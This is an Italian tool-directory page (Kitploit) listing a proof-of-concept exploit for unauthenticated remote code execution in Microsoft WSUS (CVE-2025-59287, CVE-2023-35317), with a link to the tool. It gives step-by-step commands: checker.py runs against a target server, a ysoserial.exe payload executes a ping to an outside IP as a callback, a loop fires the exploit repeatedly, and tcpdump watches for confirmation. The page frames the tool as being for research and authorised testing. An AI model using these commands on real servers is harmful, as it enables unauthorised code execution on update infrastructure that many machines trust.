Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-59287-PoC — PoC di RCE non autenticata in Microsoft Windows Server Update Service (WSUS) - CVE-2025-59287 & CVE-2023-35317 | Kitploit
Strumenti/GitHubGitHub/m507/cve-2025-59287-poc
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso Remoto
GitHubm507/cve-2025-59287-poc

CVE-2025-59287-PoC

PoC di RCE non autenticata in Microsoft Windows Server Update Service (WSUS) - CVE-2025-59287 & CVE-2023-35317

Vedi Repository
1438 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-59287 / CVE-2023-35317 PoC

Approfondimento su CVE-2025-59287: SoapFormatter RCE in WSUS: https://shellcode.blog/wsus-cve-2025-59287-investigation/

Questo software è stato creato esclusivamente per scopi di ricerca accademica e per lo sviluppo di tecniche difensive efficaci, e non è destinato a essere usato per attaccare sistemi, se non dove esplicitamente autorizzato. I manutentori del progetto non sono responsabili dell'uso improprio del software. Usalo in modo responsabile.

Utilizzo

Flag obbligatorie:

  • --target-url – URL di base del server WSUS di destinazione, es. http://WIN-246JC0TE3BB.vuln.local:8530
  • --cve – Una tra CVE-2023-35317 o CVE-2025-59287

Flag opzionali:

  • --dns-name – Nome DNS del client usato nelle richieste SOAP (default: bugcrowd.local)
  • --random – Antepone a --dns-name un sottodominio casuale, così ogni esecuzione appare come un nuovo client
  • --payload – Payload ysoserial personalizzato codificato in base64; se omesso, viene usato un payload integrato per la --cve scelta
  • --debug – Abilita il logging di debug dettagliato (righe [DEBUG])

CVE-2025-59287

  1. python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --payload BASE64_YSOSERIAL_BLOB --dns-name bugcrowd.local --cve CVE-2025-59287 --random

alt text

Trigger manuale – CVE-2023-35317

  1. (Opzionale) Genera un payload usando Ysoserial.Net se non vuoi usare quello integrato (oppure affidati al payload integrato).
  2. Esegui: python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --dns-name bugcrowd.local --cve CVE-2023-35317 --random
  3. Apri la console WSUS

alt text

Trigger automatico – CVE-2023-35317

  1. ./ysoserial.exe -g RolePrincipal -f BinaryFormatter -c 'ping 18.118.100.100' -o base64 (oppure affidati al payload integrato per --cve CVE-2023-35317)
  2. for i in `seq 1 300`; do sleep 1; python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --payload BASE64_YSOSERIAL_BLOB --dns-name bugcrowd.local --cve CVE-2023-35317 --random ;done
  3. Attendi 1-3 minuti e verrà eseguito come processo figlio del servizio.
  4. Monitora le connessioni ICMP: sudo tcpdump -l -n -i any icmp | while read line; do echo "$line"; echo -ne '\a'; done

alt text

Scarica lo strumento